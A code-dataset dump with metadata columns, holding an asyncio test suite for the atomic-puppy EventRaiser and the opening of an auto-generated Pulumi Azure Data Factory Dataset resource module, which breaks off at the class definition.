hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f045c2feb9a1e120f06832a2ce35a12d79004f7f
| 11,738
|
py
|
Python
|
tests/test_dispatching.py
|
madedotcom/atomic-puppy
|
391b6f9928d8c7558eb30d380ff5a744a9122943
|
[
"MIT"
] | null | null | null |
tests/test_dispatching.py
|
madedotcom/atomic-puppy
|
391b6f9928d8c7558eb30d380ff5a744a9122943
|
[
"MIT"
] | null | null | null |
tests/test_dispatching.py
|
madedotcom/atomic-puppy
|
391b6f9928d8c7558eb30d380ff5a744a9122943
|
[
"MIT"
] | null | null | null |
from types import SimpleNamespace as ns
import asyncio
from atomicpuppy import EventRaiser, RejectedMessageException, ExceptionCause
from atomicpuppy.atomicpuppy import Event
from .fakehttp import SpyLog
from uuid import uuid4
class When_an_event_is_processed:
the_message = None
event_recorder = {}
sequence_no = 43
def given_an_event_raiser(self):
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.message_processor = EventRaiser(self.queue,
self.event_recorder,
lambda e: self.process_message(e))
def because_we_add_a_message(self):
msg = Event(self.message_id, "type", {}, "stream", self.sequence_no)
asyncio.ensure_future(self.send_message(msg), loop=self._loop)
self._loop.run_until_complete(self.message_processor.start())
def it_should_have_sent_the_message(self):
assert(self.the_message.id == self.message_id)
def it_should_have_recorded_the_event(self):
assert(self.event_recorder["stream"] == self.sequence_no)
async def send_message(self, e):
return await self.queue.put(e)
def process_message(self, e):
self.the_message = e
self.message_processor.stop()
class When_an_event_is_processed_by_running_once:
the_message = None
event_recorder = {}
sequence_no = 43
def given_an_event_raiser(self):
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.message_processor = EventRaiser(self.queue,
self.event_recorder,
lambda e: self.process_message(e))
def because_we_add_a_message(self):
msg = Event(self.message_id, "type", {}, "stream", self.sequence_no)
asyncio.ensure_future(self.send_message(msg), loop=self._loop)
self._loop.run_until_complete(self.message_processor.consume_events())
def it_should_have_sent_the_message(self):
assert(self.the_message.id == self.message_id)
def it_should_have_recorded_the_event(self):
assert(self.event_recorder["stream"] == self.sequence_no)
async def send_message(self, e):
return await self.queue.put(e)
def process_message(self, e):
self.the_message = e
class When_a_message_is_rejected:
event_recorder = {}
def given_an_event_raiser(self):
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.event_raiser = EventRaiser(
self.queue,
self.event_recorder,
lambda e: self.process_message(e),
)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg), loop=self._loop)
self._loop.run_until_complete(self.event_raiser.start())
def it_should_log_a_warning(self):
m = "message-type message "+str(self.message_id) \
+" was rejected and has not been processed"
assert(any(r.message == m for r in self._log.warnings))
def process_message(self, e):
self.event_raiser.stop()
raise RejectedMessageException()
async def send_message(self, e):
return await self.queue.put(e)
class When_a_message_raises_an_unhandled_exception:
event_recorder = {}
@classmethod
def examples(cls):
return [
ns(use_exception_handler=False),
ns(use_exception_handler=True),
]
def given_an_event_raiser(self, example):
self.example = example
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.exc_handler_context = None
self.exc_handler_loop = None
if example.use_exception_handler:
def exception_handler(context):
self.exc_handler_context = context
else:
exception_handler = None
self.event_raiser = EventRaiser(
self.queue,
self.event_recorder,
lambda e: self.process_message(e),
exception_handler=exception_handler
)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def it_should_log_an_error(self):
if self.example.use_exception_handler:
return
m = "Failed to process message "
assert(any(r.message.startswith(m) for r in self._log.errors))
def it_should_call_the_exception_handler(self):
if not self.example.use_exception_handler:
return
assert list(self.exc_handler_context.keys()) == \
["exception", "atomicpuppy_cause", "atomicpuppy_message"], \
self.exc_handler_context
assert isinstance(self.exc_handler_context["exception"],
NotImplementedError), \
self.exc_handler_context
assert (self.exc_handler_context["atomicpuppy_cause"] ==
ExceptionCause.handler), \
self.exc_handler_context
assert isinstance(
self.exc_handler_context["atomicpuppy_message"], Event), \
self.exc_handler_context
def process_message(self, e):
self.event_raiser.stop()
raise NotImplementedError("This handler is not here")
async def send_message(self, e):
return await self.queue.put(e)
class When_the_callback_is_asynchronous:
def given_an_event_raiser(self):
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
events = {}
self.callback_exhausted = [False]
async def async_callback(evt):
self.event_raiser.stop()
self.callback_exhausted[0] = True
self.event_raiser = EventRaiser(
queue=self.queue,
counter=events,
callback=async_callback,
)
async def send_message(self, e):
return await self.queue.put(e)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def it_should_have_exhausted_the_callback(self):
assert self.callback_exhausted[0]
class When_an_asynchronous_callback_fails:
@classmethod
def examples(cls):
return [
ns(use_exception_handler=False),
ns(use_exception_handler=True),
]
def given_an_event_raiser(self, example):
self.example = example
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
events = {}
self.callback_exhausted = [False]
class Failure(Exception):
pass
self.failure_type = Failure
if example.use_exception_handler:
def exception_handler(context):
self.exc_handler_context = context
else:
exception_handler = None
async def async_callback(evt):
self.event_raiser.stop()
raise Failure()
self.event_raiser = EventRaiser(
queue=self.queue,
counter=events,
callback=async_callback,
exception_handler=exception_handler
)
async def send_message(self, e):
return await self.queue.put(e)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def the_exception_should_be_logged(self):
if self.example.use_exception_handler:
return
m = "Failed to process message "
assert(any(r.message.startswith(m) for r in self._log.errors))
def it_should_call_the_exception_handler(self):
if not self.example.use_exception_handler:
return
assert list(self.exc_handler_context.keys()) == \
["exception", "atomicpuppy_cause", "atomicpuppy_message"], \
self.exc_handler_context
assert isinstance(self.exc_handler_context["exception"],
self.failure_type), \
self.exc_handler_context
assert (self.exc_handler_context["atomicpuppy_cause"] ==
ExceptionCause.handler), \
self.exc_handler_context
assert isinstance(
self.exc_handler_context["atomicpuppy_message"], Event), \
self.exc_handler_context
class When_the_counter_raises_an_unhandled_exception:
@classmethod
def examples(cls):
return [
ns(use_exception_handler=False),
ns(use_exception_handler=True),
]
def given_an_event_raiser(self, example):
self.example = example
self._log = SpyLog()
self._loop = asyncio.get_event_loop()
self.message_id = uuid4()
self.queue = asyncio.Queue()
self.exc_handler_context = None
if example.use_exception_handler:
def exception_handler(context):
self.exc_handler_context = context
else:
exception_handler = None
class FailingCounter:
def __setitem__(self, name, value):
raise NotImplementedError()
self.event_raiser = EventRaiser(
self.queue,
FailingCounter(),
lambda e: self.process_message(e),
exception_handler=exception_handler
)
def because_we_process_a_message(self):
with(self._log.capture()):
msg = Event(self.message_id, "message-type", {}, "stream", 2)
asyncio.ensure_future(self.send_message(msg))
self._loop.run_until_complete(self.event_raiser.start())
def it_should_have_attempted_to_process_the_message(self):
assert(self.the_message.id == self.message_id), self.the_message
def it_should_log_an_error(self):
if self.example.use_exception_handler:
return
m = "Failed to persist last read event with "
assert(any(r.message.startswith(m) for r in self._log.errors))
def it_should_call_the_exception_handler(self):
if not self.example.use_exception_handler:
return
assert list(self.exc_handler_context.keys()) == \
["exception", "atomicpuppy_cause"], \
self.exc_handler_context
assert isinstance(self.exc_handler_context["exception"],
NotImplementedError), \
self.exc_handler_context
assert (self.exc_handler_context["atomicpuppy_cause"] ==
ExceptionCause.counter), \
self.exc_handler_context
def process_message(self, e):
self.the_message = e
self.event_raiser.stop()
async def send_message(self, e):
return await self.queue.put(e)
| 32.696379
| 79
| 0.628131
| 1,364
| 11,738
| 5.095308
| 0.099707
| 0.069065
| 0.056403
| 0.081583
| 0.864029
| 0.856835
| 0.842014
| 0.842014
| 0.842014
| 0.82964
| 0
| 0.002248
| 0.279945
| 11,738
| 358
| 80
| 32.78771
| 0.820043
| 0
| 0
| 0.823105
| 0
| 0
| 0.045153
| 0
| 0
| 0
| 0
| 0
| 0.075812
| 1
| 0.140794
| false
| 0.00361
| 0.021661
| 0.01083
| 0.281588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f05b3a33385a704e6d67c93fd8a623fa540ee0a8
| 32,570
|
py
|
Python
|
sdk/python/pulumi_azure_native/datafactory/dataset.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/datafactory/dataset.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/datafactory/dataset.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['DatasetArgs', 'Dataset']
@pulumi.input_type
class DatasetArgs:
def __init__(__self__, *,
factory_name: pulumi.Input[str],
properties: pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']],
resource_group_name: pulumi.Input[str],
dataset_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Dataset resource.
:param pulumi.Input[str] factory_name: The factory name.
:param pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']] properties: Dataset properties.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] dataset_name: The dataset name.
"""
pulumi.set(__self__, "factory_name", factory_name)
pulumi.set(__self__, "properties", properties)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if dataset_name is not None:
pulumi.set(__self__, "dataset_name", dataset_name)
@property
@pulumi.getter(name="factoryName")
def factory_name(self) -> pulumi.Input[str]:
"""
The factory name.
"""
return pulumi.get(self, "factory_name")
@factory_name.setter
def factory_name(self, value: pulumi.Input[str]):
pulumi.set(self, "factory_name", value)
@property
@pulumi.getter
def properties(self) -> pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']]:
"""
Dataset properties.
"""
return pulumi.get(self, "properties")
@properties.setter
def properties(self, value: pulumi.Input[Union['AmazonMWSObjectDatasetArgs', 'AmazonRedshiftTableDatasetArgs', 'AmazonS3DatasetArgs', 'AvroDatasetArgs', 'AzureBlobDatasetArgs', 'AzureBlobFSDatasetArgs', 'AzureDataExplorerTableDatasetArgs', 'AzureDataLakeStoreDatasetArgs', 'AzureDatabricksDeltaLakeDatasetArgs', 'AzureMariaDBTableDatasetArgs', 'AzureMySqlTableDatasetArgs', 'AzurePostgreSqlTableDatasetArgs', 'AzureSearchIndexDatasetArgs', 'AzureSqlDWTableDatasetArgs', 'AzureSqlMITableDatasetArgs', 'AzureSqlTableDatasetArgs', 'AzureTableDatasetArgs', 'BinaryDatasetArgs', 'CassandraTableDatasetArgs', 'CommonDataServiceForAppsEntityDatasetArgs', 'ConcurObjectDatasetArgs', 'CosmosDbMongoDbApiCollectionDatasetArgs', 'CosmosDbSqlApiCollectionDatasetArgs', 'CouchbaseTableDatasetArgs', 'CustomDatasetArgs', 'Db2TableDatasetArgs', 'DelimitedTextDatasetArgs', 'DocumentDbCollectionDatasetArgs', 'DrillTableDatasetArgs', 'DynamicsAXResourceDatasetArgs', 'DynamicsCrmEntityDatasetArgs', 'DynamicsEntityDatasetArgs', 'EloquaObjectDatasetArgs', 'ExcelDatasetArgs', 'FileShareDatasetArgs', 'GoogleAdWordsObjectDatasetArgs', 'GoogleBigQueryObjectDatasetArgs', 'GreenplumTableDatasetArgs', 'HBaseObjectDatasetArgs', 'HiveObjectDatasetArgs', 'HttpDatasetArgs', 'HubspotObjectDatasetArgs', 'ImpalaObjectDatasetArgs', 'InformixTableDatasetArgs', 'JiraObjectDatasetArgs', 'JsonDatasetArgs', 'MagentoObjectDatasetArgs', 'MariaDBTableDatasetArgs', 'MarketoObjectDatasetArgs', 'MicrosoftAccessTableDatasetArgs', 'MongoDbAtlasCollectionDatasetArgs', 'MongoDbCollectionDatasetArgs', 'MongoDbV2CollectionDatasetArgs', 'MySqlTableDatasetArgs', 'NetezzaTableDatasetArgs', 'ODataResourceDatasetArgs', 'OdbcTableDatasetArgs', 'Office365DatasetArgs', 'OracleServiceCloudObjectDatasetArgs', 'OracleTableDatasetArgs', 'OrcDatasetArgs', 'ParquetDatasetArgs', 'PaypalObjectDatasetArgs', 'PhoenixObjectDatasetArgs', 'PostgreSqlTableDatasetArgs', 'PrestoObjectDatasetArgs', 'QuickBooksObjectDatasetArgs', 'RelationalTableDatasetArgs', 'ResponsysObjectDatasetArgs', 'RestResourceDatasetArgs', 'SalesforceMarketingCloudObjectDatasetArgs', 'SalesforceObjectDatasetArgs', 'SalesforceServiceCloudObjectDatasetArgs', 'SapBwCubeDatasetArgs', 'SapCloudForCustomerResourceDatasetArgs', 'SapEccResourceDatasetArgs', 'SapHanaTableDatasetArgs', 'SapOpenHubTableDatasetArgs', 'SapTableResourceDatasetArgs', 'ServiceNowObjectDatasetArgs', 'SharePointOnlineListResourceDatasetArgs', 'ShopifyObjectDatasetArgs', 'SnowflakeDatasetArgs', 'SparkObjectDatasetArgs', 'SqlServerTableDatasetArgs', 'SquareObjectDatasetArgs', 'SybaseTableDatasetArgs', 'TeradataTableDatasetArgs', 'VerticaTableDatasetArgs', 'WebTableDatasetArgs', 'XeroObjectDatasetArgs', 'XmlDatasetArgs', 'ZohoObjectDatasetArgs']]):
pulumi.set(self, "properties", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="datasetName")
def dataset_name(self) -> Optional[pulumi.Input[str]]:
"""
The dataset name.
"""
return pulumi.get(self, "dataset_name")
@dataset_name.setter
def dataset_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "dataset_name", value)
class Dataset(pulumi.CustomResource):
